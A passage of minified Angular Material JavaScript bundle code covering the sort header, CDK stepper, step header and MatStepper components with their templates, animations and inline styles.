disableClear(e){this._disableClear=wi(e)}ngOnInit(){!this.id&&this._columnDef&&(this.id=this._columnDef.name),this._updateArrowDirection(),this._setAnimationTransitionState({toState:this._isSorted()?"active":this._arrowDirection}),this._sort.register(this),this._sortButton=this._elementRef.nativeElement.querySelector(".mat-sort-header-container"),this._updateSortActionDescription(this._sortActionDescription)}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{const i=!!e;i!==this._showIndicatorHint&&(this._setIndicatorHintVisible(i),this._changeDetectorRef.markForCheck())})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef),this._sort.deregister(this),this._rerenderSubscription.unsubscribe()}_setIndicatorHintVisible(e){this._isDisabled()&&e||(this._showIndicatorHint=e,this._isSorted()||(this._updateArrowDirection(),this._setAnimationTransitionState(this._showIndicatorHint?{fromState:this._arrowDirection,toState:"hint"}:{fromState:"hint",toState:this._arrowDirection})))}_setAnimationTransitionState(e){this._viewState=e||{},this._disableViewStateAnimation&&(this._viewState={toState:e.toState})}_toggleOnInteraction(){this._sort.sort(this),("hint"===this._viewState.toState||"active"===this._viewState.toState)&&(this._disableViewStateAnimation=!0)}_handleClick(){this._isDisabled()||this._sort.sort(this)}_handleKeydown(e){!this._isDisabled()&&(32===e.keyCode||13===e.keyCode)&&(e.preventDefault(),this._toggleOnInteraction())}_isSorted(){return this._sort.active==this.id&&("asc"===this._sort.direction||"desc"===this._sort.direction)}_getArrowDirectionState(){return`${this._isSorted()?"active-":""}${this._arrowDirection}`}_getArrowViewState(){const e=this._viewState.fromState;return(e?`${e}-to-`:"")+this._viewState.toState}_updateArrowDirection(){this._arrowDirection=this._isSorted()?this._sort.direction:this.start||this._sort.start}_isDisabled(){return this._sort.disabled||this.disabled}_getAriaSortAttribute(){return this._isSorted()?"asc"==this._sort.direction?"ascending":"descending":"none"}_renderArrow(){return!this._isDisabled()||this._isSorted()}_updateSortActionDescription(e){var i,n;this._sortButton&&(null===(i=this._ariaDescriber)||void 0===i||i.removeDescription(this._sortButton,this._sortActionDescription),null===(n=this._ariaDescriber)||void 0===n||n.describe(this._sortButton,e)),this._sortActionDescription=e}_handleStateChanges(){this._rerenderSubscription=ra(this._sort.sortChange,this._sort._stateChanges,this._intl.changes).subscribe(()=>{this._isSorted()&&(this._updateArrowDirection(),("hint"===this._viewState.toState||"active"===this._viewState.toState)&&(this._disableViewStateAnimation=!0),this._setAnimationTransitionState({fromState:this._arrowDirection,toState:"active"}),this._showIndicatorHint=!1),!this._isSorted()&&this._viewState&&"active"===this._viewState.toState&&(this._disableViewStateAnimation=!1,this._setAnimationTransitionState({fromState:"active",toState:this._arrowDirection})),this._changeDetectorRef.markForCheck()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(dA),Ee(Ma),Ee(al,8),Ee("MAT_SORT_HEADER_COLUMN_DEF",8),Ee(js),Ee(mi),Ee(Pw,8),Ee(FV,8))},t.\u0275cmp=Wt({type:t,selectors:[["","mat-sort-header",""]],hostAttrs:[1,"mat-sort-header"],hostVars:3,hostBindings:function(e,i){1&e&&he("click",function(){return i._handleClick()})("keydown",function(r){return i._handleKeydown(r)})("mouseenter",function(){return i._setIndicatorHintVisible(!0)})("mouseleave",function(){return i._setIndicatorHintVisible(!1)}),2&e&&(Rt("aria-sort",i._getAriaSortAttribute()),Ct("mat-sort-header-disabled",i._isDisabled()))},inputs:{disabled:"disabled",id:["mat-sort-header","id"],arrowPosition:"arrowPosition",start:"start",sortActionDescription:"sortActionDescription",disableClear:"disableClear"},exportAs:["matSortHeader"],features:[ci],attrs:ICe,ngContentSelectors:SCe,decls:4,vars:7,consts:[[1,"mat-sort-header-container","mat-focus-indicator"],[1,"mat-sort-header-content"],["class","mat-sort-header-arrow",4,"ngIf"],[1,"mat-sort-header-arrow"],[1,"mat-sort-header-stem"],[1,"mat-sort-header-indicator"],[1,"mat-sort-header-pointer-left"],[1,"mat-sort-header-pointer-right"],[1,"mat-sort-header-pointer-middle"]],template:function(e,i){1&e&&(Jn(),m(0,"div",0)(1,"div",1),va(2),u(),ne(3,RCe,6,6,"div",2),u()),2&e&&(Ct("mat-sort-header-sorted",i._isSorted())("mat-sort-header-position-before","before"===i.arrowPosition),Rt("tabindex",i._isDisabled()?null:0)("role",i._isDisabled()?null:"button"),g(3),F("ngIf",i._renderArrow()))},dependencies:[Ri],styles:[".mat-sort-header-container{display:flex;cursor:pointer;align-items:center;letter-spacing:normal;outline:0}[mat-sort-header].cdk-keyboard-focused .mat-sort-header-container,[mat-sort-header].cdk-program-focused .mat-sort-header-container{border-bottom:solid 1px currentColor}.mat-sort-header-disabled .mat-sort-header-container{cursor:default}.mat-sort-header-container::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 2px) * -1)}.mat-sort-header-content{text-align:center;display:flex;align-items:center}.mat-sort-header-position-before{flex-direction:row-reverse}.mat-sort-header-arrow{height:12px;width:12px;min-width:12px;position:relative;display:flex;opacity:0}.mat-sort-header-arrow,[dir=rtl] .mat-sort-header-position-before .mat-sort-header-arrow{margin:0 0 0 6px}.mat-sort-header-position-before .mat-sort-header-arrow,[dir=rtl] .mat-sort-header-arrow{margin:0 6px 0 0}.mat-sort-header-stem{background:currentColor;height:10px;width:2px;margin:auto;display:flex;align-items:center}.cdk-high-contrast-active .mat-sort-header-stem{width:0;border-left:solid 2px}.mat-sort-header-indicator{width:100%;height:2px;display:flex;align-items:center;position:absolute;top:0;left:0}.mat-sort-header-pointer-middle{margin:auto;height:2px;width:2px;background:currentColor;transform:rotate(45deg)}.cdk-high-contrast-active .mat-sort-header-pointer-middle{width:0;height:0;border-top:solid 2px;border-left:solid 2px}.mat-sort-header-pointer-left,.mat-sort-header-pointer-right{background:currentColor;width:6px;height:2px;position:absolute;top:0}.cdk-high-contrast-active .mat-sort-header-pointer-left,.cdk-high-contrast-active .mat-sort-header-pointer-right{width:0;height:0;border-left:solid 6px;border-top:solid 2px}.mat-sort-header-pointer-left{transform-origin:right;left:0}.mat-sort-header-pointer-right{transform-origin:left;right:0}"],encapsulation:2,data:{animation:[U1.indicator,U1.leftPointer,U1.rightPointer,U1.arrowOpacity,U1.arrowPosition,U1.allowChildren]},changeDetection:0}),t})(),VV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[NCe],imports:[rn,la]}),t})();function zCe(t,a){1&t&&va(0)}const WCe=["*"];let BV=(()=>{class t{constructor(e){this._elementRef=e}focus(){this._elementRef.nativeElement.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","cdkStepHeader",""]],hostAttrs:["role","tab"]}),t})(),HV=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkStepLabel",""]]}),t})(),FCe=0;const UV=new ni("STEPPER_GLOBAL_OPTIONS");let D8=(()=>{class t{constructor(e,i){this._stepper=e,this.interacted=!1,this.interactedStream=new Tt,this._editable=!0,this._optional=!1,this._completedOverride=null,this._customError=null,this._stepperOptions=i||{},this._displayDefaultIndicatorType=!1!==this._stepperOptions.displayDefaultIndicatorType}get editable(){return this._editable}set editable(e){this._editable=wi(e)}get optional(){return this._optional}set optional(e){this._optional=wi(e)}get completed(){return null==this._completedOverride?this._getDefaultCompleted():this._completedOverride}set completed(e){this._completedOverride=wi(e)}_getDefaultCompleted(){return this.stepControl?this.stepControl.valid&&this.interacted:this.interacted}get hasError(){return null==this._customError?this._getDefaultError():this._customError}set hasError(e){this._customError=wi(e)}_getDefaultError(){return this.stepControl&&this.stepControl.invalid&&this.interacted}select(){this._stepper.selected=this}reset(){this.interacted=!1,null!=this._completedOverride&&(this._completedOverride=!1),null!=this._customError&&(this._customError=!1),this.stepControl&&this.stepControl.reset()}ngOnChanges(){this._stepper._stateChanged()}_markAsInteracted(){this.interacted||(this.interacted=!0,this.interactedStream.emit(this))}_showError(){var e;return null!==(e=this._stepperOptions.showError)&&void 0!==e?e:null!=this._customError}}return t.\u0275fac=function(e){return new(e||t)(Ee(ja(()=>ub)),Ee(UV,8))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-step"]],contentQueries:function(e,i,n){if(1&e&&fa(n,HV,5),2&e){let r;Vt(r=Bt())&&(i.stepLabel=r.first)}},viewQuery:function(e,i){if(1&e&&Mi(ho,7),2&e){let n;Vt(n=Bt())&&(i.content=n.first)}},inputs:{stepControl:"stepControl",label:"label",errorMessage:"errorMessage",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],state:"state",editable:"editable",optional:"optional",completed:"completed",hasError:"hasError"},outputs:{interactedStream:"interacted"},exportAs:["cdkStep"],features:[sa],ngContentSelectors:WCe,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),ne(0,zCe,1,0,"ng-template"))},encapsulation:2,changeDetection:0}),t})(),ub=(()=>{class t{constructor(e,i,n){this._dir=e,this._changeDetectorRef=i,this._elementRef=n,this._destroyed=new J,this.steps=new Cd,this._sortedHeaders=new Cd,this._linear=!1,this._selectedIndex=0,this.selectionChange=new Tt,this._orientation="horizontal",this._groupId=FCe++}get linear(){return this._linear}set linear(e){this._linear=wi(e)}get selectedIndex(){return this._selectedIndex}set selectedIndex(e){var i;const n=Uo(e);this.steps&&this._steps?(this._isValidIndex(n),null===(i=this.selected)||void 0===i||i._markAsInteracted(),this._selectedIndex!==n&&!this._anyControlsInvalidOrPending(n)&&(n>=this._selectedIndex||this.steps.toArray()[n].editable)&&this._updateSelectedItemIndex(n)):this._selectedIndex=n}get selected(){return this.steps?this.steps.toArray()[this.selectedIndex]:void 0}set selected(e){this.selectedIndex=e&&this.steps?this.steps.toArray().indexOf(e):-1}get orientation(){return this._orientation}set orientation(e){this._orientation=e,this._keyManager&&this._keyManager.withVerticalOrientation("vertical"===e)}ngAfterContentInit(){this._steps.changes.pipe(Ro(this._steps),ea(this._destroyed)).subscribe(e=>{this.steps.reset(e.filter(i=>i._stepper===this)),this.steps.notifyOnChanges()})}ngAfterViewInit(){this._stepHeader.changes.pipe(Ro(this._stepHeader),ea(this._destroyed)).subscribe(e=>{this._sortedHeaders.reset(e.toArray().sort((i,n)=>i._elementRef.nativeElement.compareDocumentPosition(n._elementRef.nativeElement)&Node.DOCUMENT_POSITION_FOLLOWING?-1:1)),this._sortedHeaders.notifyOnChanges()}),this._keyManager=new L1(this._sortedHeaders).withWrap().withHomeAndEnd().withVerticalOrientation("vertical"===this._orientation),(this._dir?this._dir.change:Bi()).pipe(Ro(this._layoutDirection()),ea(this._destroyed)).subscribe(e=>this._keyManager.withHorizontalOrientation(e)),this._keyManager.updateActiveItem(this._selectedIndex),this.steps.changes.subscribe(()=>{this.selected||(this._selectedIndex=Math.max(this._selectedIndex-1,0))}),this._isValidIndex(this._selectedIndex)||(this._selectedIndex=0)}ngOnDestroy(){this.steps.destroy(),this._sortedHeaders.destroy(),this._destroyed.next(),this._destroyed.complete()}next(){this.selectedIndex=Math.min(this._selectedIndex+1,this.steps.length-1)}previous(){this.selectedIndex=Math.max(this._selectedIndex-1,0)}reset(){this._updateSelectedItemIndex(0),this.steps.forEach(e=>e.reset()),this._stateChanged()}_getStepLabelId(e){return`cdk-step-label-${this._groupId}-${e}`}_getStepContentId(e){return`cdk-step-content-${this._groupId}-${e}`}_stateChanged(){this._changeDetectorRef.markForCheck()}_getAnimationDirection(e){const i=e-this._selectedIndex;return i<0?"rtl"===this._layoutDirection()?"next":"previous":i>0?"rtl"===this._layoutDirection()?"previous":"next":"current"}_getIndicatorType(e,i="number"){const n=this.steps.toArray()[e],r=this._isCurrentStep(e);return n._displayDefaultIndicatorType?this._getDefaultIndicatorLogic(n,r):this._getGuidelineLogic(n,r,i)}_getDefaultIndicatorLogic(e,i){return e._showError()&&e.hasError&&!i?"error":!e.completed||i?"number":e.editable?"edit":"done"}_getGuidelineLogic(e,i,n="number"){return e._showError()&&e.hasError&&!i?"error":e.completed&&!i?"done":e.completed&&i?n:e.editable&&i?"edit":n}_isCurrentStep(e){return this._selectedIndex===e}_getFocusIndex(){return this._keyManager?this._keyManager.activeItemIndex:this._selectedIndex}_updateSelectedItemIndex(e){const i=this.steps.toArray();this.selectionChange.emit({selectedIndex:e,previouslySelectedIndex:this._selectedIndex,selectedStep:i[e],previouslySelectedStep:i[this._selectedIndex]}),this._containsFocus()?this._keyManager.setActiveItem(e):this._keyManager.updateActiveItem(e),this._selectedIndex=e,this._stateChanged()}_onKeydown(e){const i=es(e),n=e.keyCode,r=this._keyManager;null==r.activeItemIndex||i||32!==n&&13!==n?r.onKeydown(e):(this.selectedIndex=r.activeItemIndex,e.preventDefault())}_anyControlsInvalidOrPending(e){return!!(this._linear&&e>=0)&&this.steps.toArray().slice(0,e).some(i=>{const n=i.stepControl;return(n?n.invalid||n.pending||!i.interacted:!i.completed)&&!i.optional&&!i._completedOverride})}_layoutDirection(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}_containsFocus(){const e=this._elementRef.nativeElement,i=g3();return e===i||e.contains(i)}_isValidIndex(e){return e>-1&&(!this.steps||e{class t{constructor(e){this._stepper=e,this.type="submit"}}return t.\u0275fac=function(e){return new(e||t)(Ee(ub))},t.\u0275dir=Ot({type:t,selectors:[["button","cdkStepperNext",""]],hostVars:1,hostBindings:function(e,i){1&e&&he("click",function(){return i._stepper.next()}),2&e&&Gs("type",i.type)},inputs:{type:"type"}}),t})(),BCe=(()=>{class t{constructor(e){this._stepper=e,this.type="button"}}return t.\u0275fac=function(e){return new(e||t)(Ee(ub))},t.\u0275dir=Ot({type:t,selectors:[["button","cdkStepperPrevious",""]],hostVars:1,hostBindings:function(e,i){1&e&&he("click",function(){return i._stepper.previous()}),2&e&&Gs("type",i.type)},inputs:{type:"type"}}),t})(),HCe=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[R1]}),t})();function UCe(t,a){if(1&t&&Ir(0,8),2&t){const e=V();F("ngTemplateOutlet",e.iconOverrides[e.state])("ngTemplateOutletContext",e._getIconContext())}}function qCe(t,a){if(1&t&&(m(0,"span",13),s(1),u()),2&t){const e=V(2);g(1),ke(e._getDefaultTextForState(e.state))}}function GCe(t,a){if(1&t&&(m(0,"span",14),s(1),u()),2&t){const e=V(2);g(1),ke(e._intl.completedLabel)}}function jCe(t,a){if(1&t&&(m(0,"span",14),s(1),u()),2&t){const e=V(2);g(1),ke(e._intl.editableLabel)}}function QCe(t,a){if(1&t&&(m(0,"mat-icon",13),s(1),u()),2&t){const e=V(2);g(1),ke(e._getDefaultTextForState(e.state))}}function $Ce(t,a){if(1&t&&(bt(0,9),ne(1,qCe,2,1,"span",10),ne(2,GCe,2,1,"span",11),ne(3,jCe,2,1,"span",11),ne(4,QCe,2,1,"mat-icon",12),Mt()),2&t){const e=V();F("ngSwitch",e.state),g(1),F("ngSwitchCase","number"),g(1),F("ngIf","done"===e.state),g(1),F("ngIf","edit"===e.state)}}function KCe(t,a){if(1&t&&(m(0,"div",15),Ir(1,16),u()),2&t){const e=V();g(1),F("ngTemplateOutlet",e._templateLabel().template)}}function XCe(t,a){if(1&t&&(m(0,"div",15),s(1),u()),2&t){const e=V();g(1),ke(e.label)}}function YCe(t,a){if(1&t&&(m(0,"div",17),s(1),u()),2&t){const e=V();g(1),ke(e._intl.optionalLabel)}}function JCe(t,a){if(1&t&&(m(0,"div",18),s(1),u()),2&t){const e=V();g(1),ke(e.errorMessage)}}function ZCe(t,a){}function eye(t,a){if(1&t&&(va(0),ne(1,ZCe,0,0,"ng-template",0)),2&t){const e=V();g(1),F("cdkPortalOutlet",e._portal)}}const tye=["*"];function iye(t,a){1&t&&it(0,"div",11)}const qV=function(t,a){return{step:t,i:a}};function aye(t,a){if(1&t&&(bt(0),Ir(1,9),ne(2,iye,1,0,"div",10),Mt()),2&t){const e=a.$implicit,i=a.index,n=a.last;V(2);const r=Ti(4);g(1),F("ngTemplateOutlet",r)("ngTemplateOutletContext",Ah(3,qV,e,i)),g(1),F("ngIf",!n)}}const GV=function(t){return{animationDuration:t}},jV=function(t,a){return{value:t,params:a}};function nye(t,a){if(1&t){const e=Ye();m(0,"div",12),he("@horizontalStepTransition.done",function(n){return be(e),Me(V(2)._animationDone.next(n))}),Ir(1,13),u()}if(2&t){const e=a.$implicit,i=a.index,n=V(2);Ct("mat-horizontal-stepper-content-inactive",n.selectedIndex!==i),F("@horizontalStepTransition",Ah(8,jV,n._getAnimationDirection(i),fr(6,GV,n._getAnimationDuration())))("id",n._getStepContentId(i)),Rt("aria-labelledby",n._getStepLabelId(i)),g(1),F("ngTemplateOutlet",e.content)}}function oye(t,a){if(1&t&&(m(0,"div",4)(1,"div",5),ne(2,aye,3,6,"ng-container",6),u(),m(3,"div",7),ne(4,nye,2,11,"div",8),u()()),2&t){const e=V();g(2),F("ngForOf",e.steps),g(2),F("ngForOf",e.steps)}}function rye(t,a){if(1&t){const e=Ye();m(0,"div",15),Ir(1,9),m(2,"div",16)(3,"div",17),he("@verticalStepTransition.done",function(n){return be(e),Me(V(2)._animationDone.next(n))}),m(4,"div",18),Ir(5,13),u()()()()}if(2&t){const e=a.$implicit,i=a.index,n=a.last,r=V(2),c=Ti(4);g(1),F("ngTemplateOutlet",c)("ngTemplateOutletContext",Ah(10,qV,e,i)),g(1),Ct("mat-stepper-vertical-line",!n),g(1),Ct("mat-vertical-stepper-content-inactive",r.selectedIndex!==i),F("@verticalStepTransition",Ah(15,jV,r._getAnimationDirection(i),fr(13,GV,r._getAnimationDuration())))("id",r._getStepContentId(i)),Rt("aria-labelledby",r._getStepLabelId(i)),g(2),F("ngTemplateOutlet",e.content)}}function sye(t,a){if(1&t&&(bt(0),ne(1,rye,6,18,"div",14),Mt()),2&t){const e=V();g(1),F("ngForOf",e.steps)}}function cye(t,a){if(1&t){const e=Ye();m(0,"mat-step-header",19),he("click",function(){return Me(be(e).step.select())})("keydown",function(n){return be(e),Me(V()._onKeydown(n))}),u()}if(2&t){const e=a.step,i=a.i,n=V();Ct("mat-horizontal-stepper-header","horizontal"===n.orientation)("mat-vertical-stepper-header","vertical"===n.orientation),F("tabIndex",n._getFocusIndex()===i?0:-1)("id",n._getStepLabelId(i))("index",i)("state",n._getIndicatorType(i,e.state))("label",e.stepLabel||e.label)("selected",n.selectedIndex===i)("active",n._stepIsNavigable(i,e))("optional",e.optional)("errorMessage",e.errorMessage)("iconOverrides",n._iconOverrides)("disableRipple",n.disableRipple||!n._stepIsNavigable(i,e))("color",e.color||n.color),Rt("aria-posinset",i+1)("aria-setsize",n.steps.length)("aria-controls",n._getStepContentId(i))("aria-selected",n.selectedIndex==i)("aria-label",e.ariaLabel||null)("aria-labelledby",!e.ariaLabel&&e.ariaLabelledby?e.ariaLabelledby:null)("aria-disabled",!n._stepIsNavigable(i,e)||null)}}let mA=(()=>{class t extends HV{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matStepLabel",""]],features:[ci]}),t})(),uA=(()=>{class t{constructor(){this.changes=new J,this.optionalLabel="Optional",this.completedLabel="Completed",this.editableLabel="Editable"}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const dye={provide:uA,deps:[[new Cc,new Vc,uA]],useFactory:function lye(t){return t||new uA}},mye=Pd(class extends BV{constructor(a){super(a)}},"primary");let QV=(()=>{class t extends mye{constructor(e,i,n,r){super(n),this._intl=e,this._focusMonitor=i,this._intlSubscription=e.changes.subscribe(()=>r.markForCheck())}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0)}ngOnDestroy(){this._intlSubscription.unsubscribe(),this._focusMonitor.stopMonitoring(this._elementRef)}focus(e,i){e?this._focusMonitor.focusVia(this._elementRef,e,i):this._elementRef.nativeElement.focus(i)}_stringLabel(){return this.label instanceof mA?null:this.label}_templateLabel(){return this.label instanceof mA?this.label:null}_getHostElement(){return this._elementRef.nativeElement}_getIconContext(){return{index:this.index,active:this.active,optional:this.optional}}_getDefaultTextForState(e){return"number"==e?`${this.index+1}`:"edit"==e?"create":"error"==e?"warning":e}}return t.\u0275fac=function(e){return new(e||t)(Ee(uA),Ee(js),Ee(mi),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["mat-step-header"]],hostAttrs:["role","tab",1,"mat-step-header"],inputs:{color:"color",state:"state",label:"label",errorMessage:"errorMessage",iconOverrides:"iconOverrides",index:"index",selected:"selected",active:"active",optional:"optional",disableRipple:"disableRipple"},features:[ci],decls:10,vars:19,consts:[["matRipple","",1,"mat-step-header-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled"],[1,"mat-step-icon-content",3,"ngSwitch"],[3,"ngTemplateOutlet","ngTemplateOutletContext",4,"ngSwitchCase"],[3,"ngSwitch",4,"ngSwitchDefault"],[1,"mat-step-label"],["class","mat-step-text-label",4,"ngIf"],["class","mat-step-optional",4,"ngIf"],["class","mat-step-sub-label-error",4,"ngIf"],[3,"ngTemplateOutlet","ngTemplateOutletContext"],[3,"ngSwitch"],["aria-hidden","true",4,"ngSwitchCase"],["class","cdk-visually-hidden",4,"ngIf"],["aria-hidden","true",4,"ngSwitchDefault"],["aria-hidden","true"],[1,"cdk-visually-hidden"],[1,"mat-step-text-label"],[3,"ngTemplateOutlet"],[1,"mat-step-optional"],[1,"mat-step-sub-label-error"]],template:function(e,i){1&e&&(it(0,"div",0),m(1,"div")(2,"div",1),ne(3,UCe,1,2,"ng-container",2),ne(4,$Ce,5,4,"ng-container",3),u()(),m(5,"div",4),ne(6,KCe,2,1,"div",5),ne(7,XCe,2,1,"div",5),ne(8,YCe,2,1,"div",6),ne(9,JCe,2,1,"div",7),u()),2&e&&(F("matRippleTrigger",i._getHostElement())("matRippleDisabled",i.disableRipple),g(1),Dv("mat-step-icon-state-",i.state," mat-step-icon"),Ct("mat-step-icon-selected",i.selected),g(1),F("ngSwitch",!(!i.iconOverrides||!i.iconOverrides[i.state])),g(1),F("ngSwitchCase",!0),g(2),Ct("mat-step-label-active",i.active)("mat-step-label-selected",i.selected)("mat-step-label-error","error"==i.state),g(1),F("ngIf",i._templateLabel()),g(1),F("ngIf",i._stringLabel()),g(1),F("ngIf",i.optional&&"error"!=i.state),g(1),F("ngIf","error"==i.state))},dependencies:[Ri,_1,Jf,p1,d6,oa,Dl],styles:['.mat-step-header{overflow:hidden;outline:none;cursor:pointer;position:relative;box-sizing:content-box;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-step-header:focus .mat-focus-indicator::before{content:""}.cdk-high-contrast-active .mat-step-header{outline:solid 1px}.cdk-high-contrast-active .mat-step-header[aria-selected=true] .mat-step-label{text-decoration:underline}.mat-step-optional,.mat-step-sub-label-error{font-size:12px}.mat-step-icon{border-radius:50%;height:24px;width:24px;flex-shrink:0;position:relative}.mat-step-icon-content{position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);display:flex}.mat-step-icon .mat-icon{font-size:16px;height:16px;width:16px}.mat-step-icon-state-error .mat-icon{font-size:24px;height:24px;width:24px}.mat-step-label{display:inline-block;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;min-width:50px;vertical-align:middle}.mat-step-text-label{text-overflow:ellipsis;overflow:hidden}.mat-step-header .mat-step-header-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}'],encapsulation:2,changeDetection:0}),t})();const XV={horizontalStepTransition:nr("horizontalStepTransition",[sn("previous",zi({transform:"translate3d(-100%, 0, 0)",visibility:"hidden"})),sn("current",zi({transform:"none",visibility:"inherit"})),sn("next",zi({transform:"translate3d(100%, 0, 0)",visibility:"hidden"})),gn("* => *",En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)"),{params:{animationDuration:"500ms"}})]),verticalStepTransition:nr("verticalStepTransition",[sn("previous",zi({height:"0px",visibility:"hidden"})),sn("next",zi({height:"0px",visibility:"hidden"})),sn("current",zi({height:"*",visibility:"inherit"})),gn("* <=> current",En("{{animationDuration}} cubic-bezier(0.4, 0.0, 0.2, 1)"),{params:{animationDuration:"225ms"}})])};let uye=(()=>{class t{constructor(e){this.templateRef=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["ng-template","matStepperIcon",""]],inputs:{name:["matStepperIcon","name"]}}),t})(),hye=(()=>{class t{constructor(e){this._template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["ng-template","matStepContent",""]]}),t})(),YV=(()=>{class t extends D8{constructor(e,i,n,r){super(e,r),this._errorStateMatcher=i,this._viewContainerRef=n,this._isSelected=I.EMPTY}ngAfterContentInit(){this._isSelected=this._stepper.steps.changes.pipe(Ur(()=>this._stepper.selectionChange.pipe(Xe(e=>e.selectedStep===this),Ro(this._stepper.selected===this)))).subscribe(e=>{e&&this._lazyContent&&!this._portal&&(this._portal=new Mm(this._lazyContent._template,this._viewContainerRef))})}ngOnDestroy(){this._isSelected.unsubscribe()}isErrorState(e,i){return this._errorStateMatcher.isErrorState(e,i)||!!(e&&e.invalid&&this.interacted)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ja(()=>JV)),Ee(mp,4),Ee(fo),Ee(UV,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-step"]],contentQueries:function(e,i,n){if(1&e&&(fa(n,mA,5),fa(n,hye,5)),2&e){let r;Vt(r=Bt())&&(i.stepLabel=r.first),Vt(r=Bt())&&(i._lazyContent=r.first)}},inputs:{color:"color"},exportAs:["matStep"],features:[ki([{provide:mp,useExisting:t},{provide:D8,useExisting:t}]),ci],ngContentSelectors:tye,decls:1,vars:0,consts:[[3,"cdkPortalOutlet"]],template:function(e,i){1&e&&(Jn(),ne(0,eye,2,1,"ng-template"))},dependencies:[Cu],encapsulation:2,changeDetection:0}),t})(),JV=(()=>{class t extends ub{constructor(e,i,n){super(e,i,n),this.steps=new Cd,this.animationDone=new Tt,this.labelPosition="end",this.headerPosition="top",this._iconOverrides={},this._animationDone=new J,this._animationDuration="";const r=n.nativeElement.nodeName.toLowerCase();this.orientation="mat-vertical-stepper"===r?"vertical":"horizontal"}get animationDuration(){return this._animationDuration}set animationDuration(e){this._animationDuration=/^\d+$/.test(e)?e+"ms":e}ngAfterContentInit(){super.ngAfterContentInit(),this._icons.forEach(({name:e,templateRef:i})=>this._iconOverrides[e]=i),this.steps.changes.pipe(ea(this._destroyed)).subscribe(()=>{this._stateChanged()}),this._animationDone.pipe(Bh((e,i)=>e.fromState===i.fromState&&e.toState===i.toState),ea(this._destroyed)).subscribe(e=>{"current"===e.toState&&this.animationDone.emit()})}_stepIsNavigable(e,i){return i.completed||this.selectedIndex===e||!this.linear}_getAnimationDuration(){return this.animationDuration?this.animationDuration:"horizontal"===this.orientation?"500ms":"225ms"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Cr,8),Ee(Ma),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["mat-stepper"],["mat-vertical-stepper"],["mat-horizontal-stepper"],["","matStepper",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,YV,5),fa(n,uye,5)),2&e){let r;Vt(r=Bt())&&(i._steps=r),Vt(r=Bt())&&(i._icons=r)}},viewQuery:function(e,i){if(1&e&&Mi(QV,5),2&e){let n;Vt(n=Bt())&&(i._stepHeader=n)}},hostAttrs:["role","tablist"],hostVars:11,hostBindings:function(e,i){2&e&&(Rt("aria-orientation",i.orientation),Ct("mat-stepper-horizontal","horizontal"===i.orientation)("mat-stepper-vertical","vertical"===i.orientation)("mat-stepper-label-position-end","horizontal"===i.orientation&&"end"==i.labelPosition)("mat-stepper-label-position-bottom","horizontal"===i.orientation&&"bottom"==i.labelPosition)("mat-stepper-header-position-bottom","bottom"===i.headerPosition))},inputs:{selectedIndex:"selectedIndex",disableRipple:"disableRipple",color:"color",labelPosition:"labelPosition",headerPosition:"headerPosition",animationDuration:"animationDuration"},outputs:{animationDone:"animationDone"},exportAs:["matStepper","matVerticalStepper","matHorizontalStepper"],features:[ki([{provide:ub,useExisting:t}]),ci],decls:5,vars:3,consts:[[3,"ngSwitch"],["class","mat-horizontal-stepper-wrapper",4,"ngSwitchCase"],[4,"ngSwitchCase"],["stepTemplate",""],[1,"mat-horizontal-stepper-wrapper"],[1,"mat-horizontal-stepper-header-container"],[4,"ngFor","ngForOf"],[1,"mat-horizontal-content-container"],["class","mat-horizontal-stepper-content","role","tabpanel",3,"id","mat-horizontal-stepper-content-inactive",4,"ngFor","ngForOf"],[3,"ngTemplateOutlet","ngTemplateOutletContext"],["class","mat-stepper-horizontal-line",4,"ngIf"],[1,"mat-stepper-horizontal-line"],["role","tabpanel",1,"mat-horizontal-stepper-content",3,"id"],[3,"ngTemplateOutlet"],["class","mat-step",4,"ngFor","ngForOf"],[1,"mat-step"],[1,"mat-vertical-content-container"],["role","tabpanel",1,"mat-vertical-stepper-content",3,"id"],[1,"mat-vertical-content"],[3,"tabIndex","id","index","state","label","selected","active","optional","errorMessage","iconOverrides","disableRipple","color","click","keydown"]],template:function(e,i){1&e&&(bt(0,0),ne(1,oye,5,2,"div",1),ne(2,sye,2,1,"ng-container",2),Mt(),ne(3,cye,1,23,"ng-template",null,3,d1)),2&e&&(F("ngSwitch",i.orientation),g(1),F("ngSwitchCase","horizontal"),g(1),F("ngSwitchCase","vertical"))},dependencies:[Zi,Ri,_1,Jf,p1,QV],styles:['.mat-stepper-vertical,.mat-stepper-horizontal{display:block}.